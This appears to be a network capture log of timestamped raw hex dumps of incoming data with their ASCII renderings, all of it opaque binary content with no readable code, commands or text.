                                                                                                                                                                                                2023-11-17 18:25:36 UTC149INData Raw: d0 a0 73 1c 5d 60 f5 39 d8 b0 a7 1d b3 09 96 aa 26 c2 ff 31 67 a6 1c 42 1a d5 5f ed 09 46 75 81 40 cd 28 01 e7 e9 f6 a6 e8 31 3c 9d bc 58 c5 d8 6f c3 5e 38 02 4e 52 2f e0 a0 d7 9a 45 d5 9c 23 d9 34 4d df ac 77 af 16 a6 1a a3 c3 14 5d d1 04 14 a5 56 56 63 9f 1b 37 72 66 d1 2d 01 bb b6 05 02 65 40 d7 82 79 aa f8 52 a2 f9 df 79 c3 f4 ed cb fd 88 6b 4b 17 69 05 72 35 e9 8c 96 2b b5 66 79 dd 9b f1 21 0c de d5 2f dc 91 81 de 3a dc cd 80 c8 57 45 9b 62 1c b8 29 4b 39 0f 36 93 ba 4a 3b 1b bf 26 12 1e bb e0 8c 1b 4f f7 fe c7 04 1c 2e 33 26 1a f6 21 e3 ad 57 38 e9 87 30 80 fc dd 3e 23 54 88 87 19 d8 55 47 89 a3 80 e5 0c 7e a6 38 d5 bd 5f e0 4b 53 91 43 99 9c 10 56 23 d9 01 39 a7 21 5e 18 38 32 ec ad 40 cf c8 29 b6 b1 06 01 f0 03 fb 7a 5b a1 0e c7 77 0f 25 81 dc 14
                                                                                                                                                                                                Data Ascii: s]`9&1gB_Fu@(1<Xo^8NR/E#4Mw]VVc7rf-e@yRykKir5+fy!/:WEb)K96J;&O.3&!W80>#TUG~8_KSCV#9!^82@)z[w%
                                                                                                                                                                                                2023-11-17 18:25:36 UTC150INData Raw: 1c 0b fd 41 14 db ed 3a 9f 7d 0a 23 2f 70 3f dc 27 15 ad ca 31 9e 40 be c8 91 6f cd 54 b9 f6 26 3d a1 88 47 98 1a 54 fa 12 d6 ab 2d 2a 4f cd 48 d8 45 3c b8 ed 2a 71 70 3a 2f 1c aa 79 1c 25 04 f2 f9 a2 22 c1 49 ea b1 88 26 41 b7 9a a8 a0 25 f5 6b 99 b0 9d 5c 19 69 16 9a 5e 07 c9 16 8e 97 83 78 cf 72 a5 71 cd 54 b9 00 2e 93 e7 ab 03 5c a1 55 4c 8a 72 1c 1d 34 3c 35 41 53 95 24 9b d7 78 df 80 cc 8d 14 de b4 68 50 8d 91 f0 8f 85 6d 6c cb cc 17 0a 3b f3 1b 6d 1c f8 4a ee 31 5f 7c 8a 35 85 d9 d2 bf 37 77 34 c8 ab ca 9c dc 41 70 72 c5 7f cf 45 eb 6f e8 2f 81 21 d7 db 94 a2 6d 08 46 44 c3 24 e8 ba a8 50 ba ce 1f 34 c1 5a 89 3e 61 97 60 a3 23 6d f3 a6 de 27 cd 16 df d3 2c de f1 82 48 0c 1f bd 2e 7d bb 28 75 2f 41 f7 be 98 d4 c8 7d 5f a1 44 3e b7 5c a7 3f d2 57 f8
                                                                                                                                                                                                Data Ascii: A:}#/p?'1@oT&=GT-*OHE<*qp:/y%"I&A%k\i^xrqT.\ULr4<5AS$xhPml;mJ1_|57w4AprEo/!mFD$P4Z>a`#m',H.}(u/A}_D>\?W
                                                                                                                                                                                                2023-11-17 18:25:36 UTC152INData Raw: 9e 95 67 49 45 04 91 2c c2 ff 44 0d bc fc 6e 79 13 56 d7 ec 33 0b 5f 4c d4 75 76 cd b1 91 89 fe 00 a1 a8 f5 3d e0 ca 2e ff 1f f2 45 3d 77 6e c0 60 62 90 8f 78 1c 23 c5 45 7e 1a f2 24 3e a3 fb d0 56 c9 d7 1f 3f cb c9 f5 f4 e6 ef 7a 0f f4 35 9c 28 01 44 05 56 83 55 23 d0 ca 32 4e 31 a9 26 42 e9 2d 09 d6 2b 00 a2 7f f9 d4 d4 d7 c4 5c fa 07 43 36 13 fc 5f a1 8f cf d9 42 bd 38 c5 16 63 ee ea e6 e7 41 27 d6 a0 9b 81 95 8f 7d d7 58 3d 50 97 71 f4 ed 63 63 ef 0f 0a a4 72 f0 2b 5d 44 38 4b c3 be ad 5b 18 df 2c b1 6a 0f f8 81 f9 06 3b 75 73 2f 92 6a e2 cb b7 10 84 48 8b 6f ee f8 92 cc 18 10 9b 1b 03 2f 4c 8f 51 86 16 21 ea c4 18 0b ac 35 22 53 8b 9c 60 45 ed 62 fc cb 75 14 bc 86 da e7 4a bc 93 ea 85 ae 71 71 82 2c cd 9e 4b cf d2 4e 5c 4f 68 6d 48 ab de b2 ec b2 4d
                                                                                                                                                                                                Data Ascii: gIE,DnyV3_Luv=.E=wn`bx#E~$>V?z5(DVU#2N1&B-+\C6_B8cA'}X=Pqccr+]D8K[,j;us/jHo/LQ!5"S`EbuJqq,KN\OhmHM
                                                                                                                                                                                                2023-11-17 18:25:36 UTC153INData Raw: 56 a5 5d fa 4d e5 9b d3 b8 11 c0 bd 15 14 00 90 41 91 aa 59 2e ac fc b4 8d 3e f3 a9 86 28 02 d1 e5 de 94 2b 98 69 20 72 78 57 34 f0 82 db c0 f2 f2 4b ca 7b 50 e3 e9 d0 57 e9 c9 2e 23 b4 a2 95 a0 c0 7a 00 3d f2 fa 97 7c 4e 81 ff c3 21 76 cf b7 a6 aa 44 44 5d 0e ac b1 73 e7 16 69 a2 c9 15 2a 76 f1 e4 5b c4 bc b2 b0 32 d8 09 5a a9 cc 71 fc c9 8d 07 a5 12 c2 4e a0 13 fe be c9 90 31 22 8c f1 01 57 6a 81 b5 d1 1e 16 7f c1 fc 8e 31 a3 e4 dc 9b 93 8e 5c 5b 9c c4 ca b1 27 71 4b b6 96 7c 35 08 17 b4 d8 20 b4 16 8f 15 ec 55 af cc c8 c9 f4 2c a2 66 ec 41 11 15 1e 9a f0 e1 7e 16 a2 77 ef 63 8b 60 e3 49 2f ee 52 ad 2c 0b 84 32 90 64 c3 19 88 b5 43 34 52 b8 f0 da f8 1c 5c 16 c5 13 d3 9b 7e c3 79 79 22 2c f8 fa 28 fd 8c 22 04 63 f2 0f c8 3c 77 a3 be 3a ac 6c 5b 0d 26 24
                                                                                                                                                                                                Data Ascii: V]MAY.>(+i rxW4K{PW.#z=|N!vDD]si*v[2ZqN1"Wj1\['qK|5 U,fA~wc`I/R,2dC4R\~yy",("c<w:l[&$
                                                                                                                                                                                                2023-11-17 18:25:36 UTC154INData Raw: 13 c4 5a a9 18 ab 87 f9 ca 21 75 14 42 47 c9 bf d7 ce 37 3b 8c 3c 39 fd 90 fb 63 08 1b ce c4 86 bf 29 54 9a 6c 44 02 3d 81 96 96 8e 4c df b4 d5 c9 bc c6 45 67 05 61 68 fc c1 2a 60 99 af c8 8d c5 c1 f8 09 71 42 fb 8e 1c 8f fc b4 63 27 2d 98 46 f4 57 89 ef be 22 db 36 e9 a7 3c ca f4 bf 29 ff af 3f b7 43 8f b6 69 ae 89 9f eb 89 f5 f5 e9 96 73 50 f8 ec e2 2a 41 41 7a 6e bf b8 26 58 f8 b1 d0 27 fa ac c3 be 13 69 9e 93 e4 cd 44 a3 b4 73 5d 4a 31 cd 7f bb 22 78 7f 2f ca e2 7d b3 34 26 44 53 fd 48 97 9e 05 86 9f 8a 5f c4 c5 2c bf 41 0d d5 d9 71 83 e4 9b e8 7f 4a 29 41 2a 5d db c4 ae 23 c0 97 b4 05 49 55 ad 00 b7 d1 34 be 65 bb 68 8d 9f 67 d9 e5 5f 8f e2 88 3f f1 f6 03 76 bb 3d 7e bf d6 89 3c 5d 18 90 16 b0 62 70 28 df e6 35 19 86 f4 5c 6b f9 fb 45 87 24 f8 66 d6
                                                                                                                                                                                                Data Ascii: Z!uBG7;<9c)TlD=LEgah*`qBc'-FW"6<)?CisP*AAzn&X'iDs]J1"x/}4&DSH_,AqJ)A*]#IU4ehg_?v=~<]bp(5\kE$f
                                                                                                                                                                                                2023-11-17 18:25:36 UTC155INData Raw: 65 d1 e1 e0 4f b1 85 7e b5 97 d9 23 0f 0c de 80 eb 58 df 21 4f c0 b7 f5 1e b4 65 4b 93 81 bf 96 54 da 37 8a 52 22 11 76 fa a3 d0 39 8f 5b 82 af f7 d1 a8 96 76 54 41 22 00 16 1a 13 93 cd a0 da 4d 2d b8 de f0 2f 39 6d 0d e4 2b 45 5d 82 a1 d4 5a cc 42 71 31 24 c4 dd 90 3a ed f6 d2 ea 84 b3 a3 d9 5a 26 98 7c ec 6e fe 44 78 7c 84 1b 0c c9 c4 f2 03 02 3c 1a 35 9e 75 5d 23 c7 d6 dc d3 71 59 a3 c4 b9 ef 48 54 bf 94 2c c9 0d 81 2e 97 a2 59 3f ce 79 3b c8 c7 06 e8 73 32 52 49 0b ab 1b 4a 54 9c e8 b3 f2 e2 85 6d 73 03 ad 6f 4f bd 28 20 42 4f ae 94 3f b3 a7 8d 89 bb c0 42 f9 46 0d ae 8d 50 32 10 7d 34 de 6e 59 3c 38 8e 0a 40 82 13 d8 bb 16 fe 7a bd 5a 22 77 d1 7b a2 9a 09 1b 64 82 4e ae 6f 14 69 13 7c 6e 65 8b db 85 5e 5d c6 69 e9 be 77 13 22 1e 03 22 54 66 fc 32 90
                                                                                                                                                                                                Data Ascii: eO~#X!OeKT7R"v9[vTA"M-/9m+E]ZBq1$:Z&|nDx|<5u]#qYHT,.Y?y;s2RIJTmsoO( BO?BFP2}4nY<8@zZ"w{dNoi|ne^]iw""Tf2
                                                                                                                                                                                                2023-11-17 18:25:36 UTC157INData Raw: 49 25 ac 36 80 d2 8a b4 ee 64 5a e3 e2 ed 25 b6 f8 bf f0 dd 6e cf 2e 6b f3 87 1e f2 b9 5a 0a 70 af 4d 7d 0f e4 2f 4d 1b 24 33 7c a9 30 46 00 0c 17 b7 7c fb 76 54 00 97 b7 93 e3 e9 94 84 58 91 5b 38 01 f6 2d c9 d4 7e 8a da e0 47 d2 7a 09 b5 e8 9b c9 a4 e2 1b 52 15 77 9c 88 5b 4a a8 d9 94 7c c0 0c 02 ea 38 c7 77 9b 6d bb b4 24 92 61 29 0b 97 8a be 1e 50 4a ea 74 bc 28 57 3e 76 12 99 b7 75 df 76 be cb 9c c2 92 d9 87 2a c9 23 66 c2 d0 3d 7a e0 50 3e a2 cd b4 a4 d8 fd d1 94 ca ad 2a 2a 76 51 b6 5c 87 fa 76 01 62 43 dd df 35 5d a3 12 df 8c d6 08 37 8a 52 ed 20 a3 64 0a 89 3d 17 19 b4 4a 82 58 4c a4 3e 68 40 1e 06 d3 bd 12 2f 83 2a 07 57 bd 49 38 a2 46 d6 88 1b d0 2c 32 6d 57 23 2c a9 c9 a5 05 88 f4 e4 60 11 a8 dd f4 68 ca c4 d6 a6 d3 68 04 96 1a d9 95 b5 d1 87
                                                                                                                                                                                                Data Ascii: I%6dZ%n.kZpM}/M$3|0F|vTX[8-~GzRw[J|8wm$a)PJt(W>vuv*#f=zP>**vQ\vbC5]7R d=JXL>h@/*WI8F,2mW#,`hh
                                                                                                                                                                                                2023-11-17 18:25:36 UTC158INData Raw: 30 5f 2b c2 bb 95 0a 19 8f df 34 33 ed 4d 9c 4c 4e c3 1d 7a c6 31 93 af 5b a4 8e be d4 95 47 b4 64 77 85 e5 07 67 61 2b 6d 1b 1f fe f4 29 51 a8 fa f2 9e c0 06 5d 77 09 52 80 90 56 0b 3a 54 b7 8f 4a 6f 53 74 ee 20 d1 ea 16 d9 31 5a 2d 29 f1 01 1e 3a 10 d4 70 af fe 85 c6 bd 4a fa 38 10 f6 06 6f ab 48 06 f5 db 03 7c 34 6e da a8 c5 7d 1b 60 52 eb fa 95 5a 05 b9 2a 9e 99 da f0 53 48 dc c8 5f d3 67 e2 16 05 f6 a8 3e 99 f1 1e 7a c0 c9 fa 04 30 3a 7e 9e 4e 77 81 c0 7a 12 c2 bb 55 f4 7f 6e 1b 0a a4 56 53 ba 64 cb f3 f8 e5 17 25 38 75 41 ea 4d 48 bb 58 b4 02 c0 1b c4 52 b1 aa ad 4b 8b d0 71 f3 53 fd a0 c8 8e 79 c3 cc 9e 68 e5 b0 1d 8c 6e c4 b1 70 a2 5c 59 b5 67 c1 10 18 40 42 b3 e0 dd aa a1 08 7e d2 7b 17 69 2c 55 ce 4d 32 b2 ec fb 8b 77 d8 f9 72 27 d5 a3 6e 39 70
                                                                                                                                                                                                Data Ascii: 0_+43MLNz1[Gdwga+m)Q]wRV:TJoSt 1Z-):pJ8oH|4n}`RZ*SH_g>z0:~NwzUnVSd%8uAMHXRKqSyhnp\Yg@B~{i,UM2wr'n9p
                                                                                                                                                                                                2023-11-17 18:25:36 UTC159INData Raw: 32 dd b4 4e 2e b3 29 0d d7 a2 d3 d5 14 b0 ff 88 ec 78 d9 f8 9c b4 9c 94 62 a4 72 da 3f 82 5b 57 d4 da f2 7c 0c 24 a6 62 dd ad bf ed ae b4 2a 3e 0b 1b 74 6b 95 c8 19 37 5e 38 2f b0 9c 63 74 6b 45 30 32 34 bc e1 14 eb 28 a5 f3 b1 23 78 8a e3 fa af 97 b2 8a ef b1 4c ba 9a 84 a1 41 0e 6d 8a a0 79 fc 63 ea 01 e8 d5 2b 3c f2 7b 1c 32 b9 9a bf 30 53 b9 6b f0 01 b3 0f 11 ec 3c f3 f5 8c d8 20 07 07 d7 e5 5f f9 94 14 ed 55 8b 35 bd d0 c3 ff e6 a8 85 e9 4b 97 7e 7e 9d 07 e9 0e 2b f4 ed 0a 0a fa 8d 6a 1b 70 18 23 dc 32 64 e7 05 92 2e ed 36 ba 6b c2 d8 4d 7b 59 3d 56 67 fb a8 2b 0a 15 8d 31 4a 5a a3 f1 16 5c f9 29 4c 15 e5 2c e6 7c a3 c3 f9 3c 3a 90 27 1e c5 c9 bf 70 0b dc 47 e9 cd 58 10 0e a7 58 42 9f 70 be 59 c4 90 98 ab 47 97 b2 0a d7 70 ea 39 df f6 2c 88 8a 70 6b
                                                                                                                                                                                                Data Ascii: 2N.)xbr?[W|$b*>tk7^8/ctkE024(#xLAmyc+<{20Sk< _U5K~~+jp#2d.6kM{Y=Vg+1JZ\)L,|<:'pGXXBpYGp9,pk
                                                                                                                                                                                                2023-11-17 18:25:36 UTC160INData Raw: 40 11 7e a2 3d 93 04 5a da 7d 3a 5c a5 4a 39 95 02 68 1a 93 39 56 de a3 3b f6 23 25 60 a4 7f f4 a9 2a 14 01 94 58 ec 30 13 0f 56 e9 0f 89 3c fd 6e 5a c0 16 67 06 31 a4 e8 d9 2f 4f c9 2e 29 3f 18 c1 9f 7e b2 a3 d1 d2 b7 11 49 ba 4a c3 5c 56 54 57 ef 70 9e 98 df 5a be cf d8 8f d0 89 33 01 b4 b1 f6 5b 29 ca cf eb de 7f c6 9b 27 21 76 a1 f7 83 e2 0f 4c a5 43 e5 89 73 86 92 aa 56 25 56 4e 72 71 d5 24 ce eb 8b 56 4d 40 d0 2e 5c 24 36 7f 78 da 57 52 ac 7c ef d9 6c 91 33 7b 96 b1 c3 62 25 06 19 e2 af 94 a2 58 2f 21 cc 94 e4 7b 70 6e fc ad f8 cc 0c a9 5c 6b 57 73 35 e3 14 cc d5 c8 97 2a eb 4b 86 34 89 f1 7e b4 f6 d5 83 a4 42 86 16 01 c4 ad bf 71 0e 9b ea 17 f7 77 aa e3 93 0d c4 45 58 60 fd d3 ba d0 8f 5f e6 a3 87 f6 0d b8 dd b6 e7 3c f8 0a 70 84 27 ea 7f 27 bb 54
                                                                                                                                                                                                Data Ascii: @~=Z}:\J9h9V;#%`*X0V<nZg1/O.)?~IJ\VTWpZ3[)'!vLCsV%VNrq$VM@.\$6xWR|l3{b%X/!{pn\kWs5*K4~BqwEX`_<p''T
                                                                                                                                                                                                2023-11-17 18:25:36 UTC161INData Raw: e2 5f 67 b7 52 5c 64 fe cc 84 ee 97 37 65 9d eb 30 88 6a d2 9a d7 75 89 12 ad 74 4f 10 c4 13 c9 b3 06 4c 58 19 b6 5d 2c 3b cf da b8 14 58 ae 09 92 d8 c2 87 98 c5 cf d8 77 3f 5d ae dd 47 a4 51 90 26 f3 3c b3 58 35 4e af 00 ed 68 be a1 94 f5 c2 5b 15 d7 23 c0 63 58 7b cb ba 54 48 23 a4 fc 8d 56 14 9c 87 42 09 49 28 94 b9 cb
                                                                                                                                                                                                Data Ascii: _gR\d7e0jutOLX],;Xw?]GQ&<X5Nh[#cX{TH#VBI(
                                                                                                                                                                                                2023-11-17 18:25:36 UTC162INData Raw: d6 1e 6b 13 9f 63 32 74 bc 92 6f 17 99 aa a8 71 a3 3a 44 a2 a2 fe a0 8a 12 63 b5 f5 31 c9 a7 17 27 22 0e 57 8b 28 37 af d8 37 67 dd d1 88 5a c3 e2 94 ac f9 c5 15 3b 11 83 8c 98 77 03 3c d5 bd 95 ea 44 03 d5 af 96 39 2a 2e c6 a9 96 18 61 ee fd 89 30 85 28 43 51 87 b7 7f 08 65 ae a6 53 b4 1c dd d2 9d 88 aa bb b9 d6 99 7a 07 fc 5a 0c 45 88 1c c3 e0 b7 12 0b 6c 8f 9c b6 76 2b 55 af e2 f2 11 23 ec d0 8a b2 1e 2a 15 a9 65 a0 db 9e fc 7d 15 07 ed 5a 05 61 ed 53 71 4e 0f 19 90 7c b0 a2 18 ac 68 ec 50 47 d0 2e 92 fa 15 32 39 e1 42 dc e8 f9 be c5 9a c9 a3 28 73 2b ae 2a e1 64 85 49 74 d2 1a 76 46 96 d1 d8 2e 41 41 a6 1c f9 01 d7 c4 05 97 92 dc 74 95 2e d6 e9 cd 53 b4 b7 89 19 43 89 c5 ec 1a a6 6b 48 0c 48 72 8b 55 9c 10 0d db e7 aa df 66 f1 05 72 fb cd 7b fb 94 c6
                                                                                                                                                                                                Data Ascii: kc2toq:Dc1'"W(77gZ;w<D9*.a0(CQeSzZElv+U#*e}ZaSqN|hPG.29B(s+*dItvF.AAt.SCkHHrUfr{
                                                                                                                                                                                                2023-11-17 18:25:36 UTC163INData Raw: ea 76 cc f6 57 b6 4e 06 f2 2a f6 58 9d bb 61 bd e8 db 47 c4 f4 d6 c8 d6 b7 ea 74 40 60 0b 75 ee 99 bb c3 b0 e7 55 7d 42 85 db f6 c5 e5 9c b1 41 d7 a9 07 e5 6b cf fc 28 a6 ea ec ff cb 35 76 d9 bc 0c 6d 9a 96 51 66 e7 5e bd 88 3a 3d f9 fd 0f 34 4e 2b 62 ce 5d af cd 1f 97 ba aa 4f d4 70 cf 49 e1 76 9c 3b b4 2a 3b cb c4 59 94 f8 3e 93 79 26 cc a1 28 9e 26 16 ce 7d f9 3b 7e d6 52 14 6f 7c fc 02 3d 9e b3 0d 63 e2 d5 73 2a 65 ed 60 1a bf 69 27 dd 47 68 44 9a d7 40 71 1a 03 a4 ad b6 c8 03 46 c5 77 88 4d de f3 8d 71 bf 1b 54 09 6b ce d5 ee 71 25 5f 59 4b d4 fb d1 a7 cf 01 0c 94 9a 9e 3c 32 e2 7c 91 04 17 ac 80 5a c3 3a 30 28 5e 8a 55 cc bc e6 4d 46 2d 23 07 7e 21 11 26 9d 8c db 51 62 41 9a 1f 9e 2a 0f 1e 0d 69 36 03 e2 c6 09 95 a0 fc cb a0 3a f5 e2 42 d1 6b fa 3e
                                                                                                                                                                                                Data Ascii: vWN*XaGt@`uU}BAk(5vmQf^:=4N+b]OpIv;*;Y>y&(&};~Ro|=cs*e`i'GhD@qFwMqTkq%_YK<2|Z:0(^UMF-#~!&QbA*i6:Bk>
                                                                                                                                                                                                2023-11-17 18:25:36 UTC164INData Raw: 85 9f e3 a0 d4 0b 93 c4 4e 33 6b 43 9a 26 53 56 0f 56 3e e2 df cb 1a 18 09 41 30 fb 7d 00 1f 83 42 86 d4 4d a2 8a 9c 5c ae 18 a7 48 93 15 8d d9 51 58 9f 08 71 b0 7a 15 40 ac 0a 27 a5 46 e4 9f 99 9f 71 7e 43 8f a6 a9 5d 11 72 71 ad cb 1e 65 1e c8 19 f8 de 4e a8 87 47 98 68 50 e1 a1 bd 3f b6 2a 43 31 30 7b 4f ae cd 8f e2 c5 11 0b 83 76 91 17 1b 4a e3 16 9c 51 57 ce e9 13 13 ab 10 ea 62 05 5a a9 0e e4 d3 f2 35 74 f3 16 9d a2 88 2b 53 cc 5f 46 8b 9b f7 64 5f 91 db 04 65 03 1f e7 a6 40 83 8f 47 5f 11 77 8c f9 dd 55 1a 3d 12 64 51 b2 63 06 86 c8 d6 56 3c e7 b8 6c f0 93 a8 9a 2e 1c 44 1b 33 b1 d2 c1 bf 82 26 ad 9c 35 91 27 ed b5 42 85 e3 b7 d7 b9 9b 7d b1 4a 0e 95 1e a9 8a 4d dc a3 19 94 f3 4c 2b 5e ea 67 61 3f 6a a5 9b 12 ff 9e df 2f 2f 34 e8 07 8b c3 ba c6 1e
                                                                                                                                                                                                Data Ascii: N3kC&SVV>A0}BM\HQXqz@'Fq~C]rqeNGhP?*C10{OvJQWbZ5t+S_Fd_e@G_wU=dQcV<l.D3&5'B}JML+^ga?j//4
                                                                                                                                                                                                2023-11-17 18:25:36 UTC165INData Raw: 05 9e ee 87 32 a5 fb ed 84 93 20 0d 82 94 c3 22 02 e2 ff 32 ba c6 60 f2 ad 64 96 c4 5d 02 2c 47 b1 5a c4 0e b0 d3 3f f6 1c 85 10 90 4f 0d 3a 4e e0 6d bb 0e bc 3c a6 35 26 67 93 fd fc 02 c7 87 81 b8 b5 9f d4 3e 28 4e 4a 0c ff cd a0 3e 38 d1 24 f7 6a 34 ec c3 49 c1 8c c5 f2 f4 1b 77 8d af ea f0 7d 22 ab e9 07 50 62 c4 90 49 a1 6d c9 5a c8 a7 c2 37 2f 1d b8 3c 06 62 4b fe 44 69 ca 94 e1 ed 2c ca 8d b1 09 18 34 9f 6f f3 96 38 f9 9a f4 f9 8b a9 f0 96 81 4a 4f ea 24 93 50 42 f2 05 eb 9a f5 9e 0b 16 69 be 3c e6 6c 9f c7 61 cf 4b 4b c5 57 4a a8 80 a4 ee 66 ee 56 5e c3 2b 33 7e b2 67 ee 4d 85 5b 95 ab 0a 21 ad a7 0e a6 d5 6c 6c 56 22 e7 c4 1d 92 76 6e 0e 12 a5 50 14 91 86 a7 ca c1 31 d4 b0 7f 13 6b 15 12 b7 22 12 d2 d6 cd b0 84 82 28 09 97 ce f9 d7 34 99 2c f3 3c
                                                                                                                                                                                                Data Ascii: 2 "2`d],GZ?O:Nm<5&g>(NJ>8$j4Iw}"PbImZ7/<bKDi,4o8JO$PBi<laKKWJfV^+3~gM[!llV"vnP1k"(4,<
                                                                                                                                                                                                2023-11-17 18:25:36 UTC166INData Raw: 55 53 83 ec fd 7a f4 92 3a 7f c4 22 88 15 40 e6 bf 5a ae db dc d5 ab d6 63 5f d5 20 b3 ac 07 10 0f e9 8c 5c df 4d d0 dd b8 e2 1d 4c 34 54 12 b8 4c 12 1d 4d 6c db e5 90 41 fe 4c 12 a0 46 c9 2e 54 3e 35 1f ba b3 76 b4 c3 f1 6a 36 d4 98 cc e8 d2 ac b3 5c c3 90 69 75 55 a0 74 72 61 72 3d f1 b0 c9 bf 49 07 4b 0c 17 54 a5 4b 04 6e 80 a3 fc d2 9a ca d5 d0 5d 4f 85 8e ac c1 0e 82 72 40 3d c3 bb 9d 71 4e 25 de 74 8f 36 d0 93 40 81 3b 4e 9d 3b 7c 63 22 9a b5 4f f5 2a b7 4f d6 e5 b0 f6 80 7b 33 cf c7 46 cc 5d a8 c3 2e ed 25 21 65 d0 1e 0e a5 17 54 24 0e 4c b2 1b 25 8d 80 e0 73 95 06 9d 0b ab 59 3f 2d 02 63 97 2f 0d 43 5f 3a fb 95 5d 51 97 70 f7 af c9 72 0d 73 42 29 3e db 7c 2b 55 b1 8e f4 43 85 a6 72 50 50 07 86 3f 8f 5f 5f 70 ce 0e c0 a9 1c d9 37 4b 80 e8 34 f3 9a
                                                                                                                                                                                                Data Ascii: USz:"@Zc_ \ML4TLMlALF.T>5vj6\iuUtrar=IKTKn]Or@=qN%t6@;N;|c"O*O{3F].%!eT$L%sY?-c/C_:]QprsB)>|+UCrPP?__p7K4
                                                                                                                                                                                                2023-11-17 18:25:36 UTC168INData Raw: 7f bf b0 fd f0 30 52 b2 33 86 19 9c 51 d9 d9 18 93 7b 99 a6 e2 19 2b a5 de 7f ed 44 9d 9e 05 c9 7e 19 a7 41 e6 fc 8b 1e 34 0a b6 92 7f 7c 53 11 e3 ac 05 87 77 50 42 56 19 2a 95 34 16 01 d3 aa 16 88 10 7a dc 45 f8 67 33 d3 f6 05 03 d8 0b e0 78 70 e7 9b 06 06 b0 2f 0c ef a1 4a a1 2e 92 eb c6 55 57 52 82 d3 79 7a 9d 70 6d af 8a d0 30 40 ef b5 1a 96 ac 43 02 44 2d 69 29 d0 80 76 4f c6 47 78 0f b5 4e a4 ed c2 62 5e d7 a2 23 29 11 d5 63 41 7d 50 b8 87 f6 79 e9 2c 51 f2 f4 f2 cb 54 35 d2 f4 1f 33 1a a7 04 25 98 95 6a 8e 99 08 98 1f 20 11 6d 78 03 3f 40 42 e7 f5 02 2d 99 74 67 c5 26 23 44 5c 4f 73 fe 58 a5 15 78 1e 78 d5 46 9d 7a 74 44 b9 9b 42 59 61 81 8b 3b 8b 18 14 eb 83 7d 04 d2 1a cc c5 24 15 d0 85 fa 8f b2 4e 72 a7 95 a7 55 b7 ee 99 d3 0c f0 c7 7c 3e 12 99
                                                                                                                                                                                                Data Ascii: 0R3Q{+D~A4|SwPBV*4zEg3xp/J.UWRyzpm0@CD-i)vOGxNb^#)cA}Py,QT53%j mx?@B-tg&#D\OsXxxFztDBYa;}$NrU|>
                                                                                                                                                                                                2023-11-17 18:25:36 UTC169INData Raw: 02 21 00 c6 02 1e 3d bc 2d 36 11 9e eb f6 b4 e7 91 d3 69 0c ff 1f 30 a9 50 e8 b8 45 fa 29 25 25 c5 25 dc 92 1d 13 27 86 e7 22 bd 88 ca c5 8a bb 7d da e1 0f 3c e8 5a fd 7c 5f 87 80 15 22 e6 bf d0 33 c7 a4 6b a3 85 11 ad 57 4c ba 28 65 5a 36 7f de c8 5e 66 a9 3a 9f 8f 0f 50 77 2a 56 47 bd 6f 3a 8f 6d 6d 81 14 19 70 99 92 39 bf 74 c7 44 66 db d1 b3 1c 8c 5b 6e 22 3d d8 fa 39 15 1b ad 69 38 c9 b0 e3 89 69 fe 9c 97 85 ca 14 88 10 e9 5c 85 c7 31 ae 6f e0 21 17 c7 3d 11 3c 12 32 25 60 ae f3 d7 06 7b ef 18 c5 da 24 c1 81 52 ce f9 da 2a 06 10 19 53 0d ed 0b 23 6e 58 cc 7b ef 77 1b 97 c5 61 d9 16 4b 8b 9a 20 16 f2 87 72 53 83 32 f5 a4 d4 71 11 cb 31 5d 4a c1 98 58 9d 94 55 6d 1e 37 2e 45 3d c0 9b fc d9 fd 34 05 18 18 c9 5c d2 cc 7e db 3a d7 bf 3c 54 b1 41 ec 37 24
                                                                                                                                                                                                Data Ascii: !=-6i0PE)%%%'"}<Z|_"3kWL(eZ6^f:Pw*VGo:mmp9tDf[n"=9i8i\1o!=<2%`{$R*S#nX{waK rS2q1]JXUm7.E=4\~:<TA7$
                                                                                                                                                                                                2023-11-17 18:25:36 UTC170INData Raw: 7d 65 f5 f2 67 7f c4 b6 e3 1a db 6b 5d fb d2 20 d5 a5 94 18 9b ab 9d b5 6c 63 40 40 a1 59 6d ae 5d d0 83 00 98 dd dc 97 4a 1a 58 4f 47 18 58 4a 22 a1 29 36 05 cb 95 02 70 20 3d 11 e9 82 bd 30 ca 1c a6 37 90 41 7c e9 1e 89 ab 4a 8e 5c 37 44 8f ee 18 d9 2e 27 6c 78 71 b9 95 35 dd 4b eb 03 ae 7c 51 00 92 7e 76 63 0e e2 f3 03 b0 47 33 bb 19 ff 74 f1 42 8d 97 75 93 8f 3a 4e 54 5c 78 5c 34 3d 93 5a dc db 9e 8b 60 49 ee 7b 96 8d e2 b6 cf c6 c9 8d 63 db c7 6a 58 5e 28 a6 b9 b7 10 a8 b2 94 9e 7d 90 2d 99 a9 85 28 78 66 3f 5d b5 d8 a6 e9 d2 be e6 fe bc e0 0f 0f 3c a0 3a b4 b5 c2 74 de cc 73 33 d7 e0 f3 2e a9 0d f5 47 19 80 5b c3 99 53 ea 34 48 13 e0 e7 83 d4 6b 2b 00 0f 2f 67 d7 30 c7 57 d8 d3 73 cb 71 28 28 e0 22 bc 6b f5 ea e4 a0 3b 9c 0b 9c 70 ea cd 1f 2e ee b5
                                                                                                                                                                                                Data Ascii: }egk] lc@@Ym]JXOGXJ")6p =07A|J\7D.'lxq5K|Q~vcG3tBu:NT\x\4=Z`I{cjX^(}-(xf?]<:ts3.G[S4Hk+/g0Wsq(("k;p.
                                                                                                                                                                                                2023-11-17 18:25:36 UTC171INData Raw: 33 0a cf aa 50 d5 7a 3b b2 52 6a 5b e3 1e 2c 0a 54 34 28 f0 d0 e9 2a 26 a9 ad d9 27 16 55 24 39 b2 64 ce 1f 48 f3 49 6a 2a 68 e9 cf 70 37 8b 11 9e e7 bb 07 7c 2f e1 b5 97 25 c9 f9 62 3f c3 a2 7e 5f e1 ed d4 43 27 7a c3 5d 3d 1d 28 27 a4 c5 30 4a 15 3c d0 dd fd ea 07 30 48 91 c3 33 db f8 54 9c da 92 46 b8 ba 41 33 97 e0 ea 7f 88 61 37 7d cf 20 b0 e9 63 2c f1 47 f8 97 9d 01 9e 69 96 01 8b 50 4f af fd 59 b0 e8 84 4b 29 97 77 d5 53 74 57 63 45 b1 24 9e bb d9 4d f9 81 50 99 2b ba f9 83 67 a5 f7 d1 8a 3b 4d 0e d4 02 d4 9c df b3 75 3c 75 f8 92 37 ae 46 46 51 79 61 ad ab 93 42 04 f2 1c a5 05 bf 74 39 79 d9 a1 22 fe 7e b0 18 83 55 7d a4 81 23 8b 14 19 24 d8 5d 2f 08 98 96 9b 11 23 6e 49 39 21 4a 24 25 23 34 a9 b6 e1 11 c3 05 aa e6 2c 8f 0c e2 b5 76 fc fb ea 53 13
